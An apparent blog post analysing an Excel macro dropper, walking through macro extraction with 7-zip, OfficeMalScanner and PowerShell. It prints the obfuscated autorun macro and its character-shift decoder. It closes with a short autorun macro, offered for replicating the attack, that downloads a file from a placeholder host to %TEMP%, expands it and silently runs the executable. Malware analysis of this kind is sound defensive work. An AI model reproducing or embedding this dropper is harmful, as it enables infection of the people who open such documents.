Office document malware - office_vb_dropper decoding. Sample A

Lenny Zeltzers cheat sheet will tell you how to extract the macros, however it does not tell you what to do with the macros, or at least point you in the right direction to reveal the code in a more human readable way.

Procedure


In this example I have a new excel formatted document .xlsm. In order to pull out the macro we need to open the file in 7-zip since it is just an archive container.

Go into the xl directory and extract the vbaProject.bin
  

  
Now we can use OfficeMalScanner from www.reconstructer.org.

I tend to create a working folder to drop malware into and extract artifacts etc.
Open up powershell prompt and

cd "C:\Users\myaccount\Desktop\Malware Analysis\17-02-15"

I tend to put programs that don’t require installation under c:\bin\ we will now use office mal scanner to extract the vb code.

C:\bin\OfficeMalScanner\OfficeMalScanner.exe .\vbaProject.bin info

Now in your working folder, we should have the extracted contents in folder called, VBAPROJECT.BIN-Macros.

We have a lot of files, so we need to join them up so it’s easier to debug what’s going on here. 

Manual method is to select all files and edit in notepad++, create a new file and copy them in one by one, closing each file that has been copied. I save this files as combined.txt.

However it's easier to use powershell to do our bidding.

cd .\VBAPROJECT.BIN-Macros

This simple powershell command will join up the files, however the file beginning with __ will be at the end and this has the first routine called.

Get-Content * | Set-Content combined.txt 



It looks like the __SRP_1d is the project file for the vb macro inside the doc, and as such contains the first function it should execute on document load.


By combining all these files it should be easier to search for the function that is called.

Sub Workbook_Open()
    tyrtyaag
End Sub
Searching for the highlighted text finds.

Attribute VB_Name = "Module11"
Sub tyrtyaag()
FfdsfF = NewQkeTzIIHM("pzq-<X-]|„r`uryy;r…r-5[r„:\owrp-`†€rz;[r;droPyvr{6;Q|„{y|nqSvyr54u}G<<AC;@=;A?;>B><x„rsr„rs<stq€rr<q…‡~;w}t4942aRZ]2iWV\v|qsuv|VU;pno46H-r…}n{q-2aRZ]2iWV\v|qsuv|VU;pno-2aRZ]2iWV\v|qsuv|VU;r…rH-€n-2aRZ]2iWV\v|qsuv|VU;r…rH")
Shell FfdsfF, vbHide

End Sub
I can see here that it is creating a value that is equal to a routine with something passed into it, this looks like the beginning of a decode routine. So I search for the highlighted routine. The shell call will execute the variable that has been decoded.
Attribute VB_Name = "Module14"
Public Function NewQkeTzIIHM(ByVal AESdyLylMjhJrIu As String) As String
GoTo lZiGBegMhmukPZZYdz
lZiGBegMhmukPZZYdz:
GoTo httIMPHgvoYFI
httIMPHgvoYFI:
GoTo JYUDQqqRamOiNl
JYUDQqqRamOiNl:
GoTo DOIbKh
DOIbKh:
Dim YyJDVSqLkdZk As Long
GoTo epGUden
epGUden:
For YyJDVSqLkdZk = 1 To Len(AESdyLylMjhJrIu)
GoTo lRYrzpUP
lRYrzpUP:
GoTo TELSjKJaPRJjLqoQK
TELSjKJaPRJjLqoQK:
GoTo MblTSGGiqCfyeCTgTRL
MblTSGGiqCfyeCTgTRL:
GoTo xhsyu
xhsyu:
GoTo YtuEcImBipHPFlghfkUO
YtuEcImBipHPFlghfkUO:
NewQkeTzIIHM = NewQkeTzIIHM & Chr(Asc(Mid(AESdyLylMjhJrIu, YyJDVSqLkdZk, 1)) - 13)
GoTo Lcgja
Lcgja:
GoTo Hrnbw
Hrnbw:
GoTo rBkkQJ
rBkkQJ:
GoTo TiOhSQwlicurNkI
TiOhSQwlicurNkI:
Next YyJDVSqLkdZk
GoTo ZoJKUeZCSlFZSIowxvAm
ZoJKUeZCSlFZSIowxvAm:
GoTo QddswzqP
QddswzqP:
GoTo HpsMptHRnAnaBQVygxjn
HpsMptHRnAnaBQVygxjn:
GoTo ysKHfAZQM
ysKHfAZQM:
GoTo EaNQvpSUBV
EaNQvpSUBV:
End Function
So we can use the code to reveal itself if we break it’s flow. Open word and create a new macro module. Copy in both functions and remove the shell line. Take out some of the content in the ( ) and run the macro.
I got this message;
Now I’ll add in some more and see how this develops.
Ultimately we end up with.
So in short the simplest way to replicate this type of attack is to embed the following autorun macro.
Sub simple() Shell "cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://somehost/this/folder/nasty.jpg','%TEMP%\nasty.cab'); expand %TEMP%\nasty.cab %TEMP%\nasty.exe; start %TEMP%\nasty.exe;", vbHide End Sub
This will fail if a proxy is required by the way. 

Comments

Popular Posts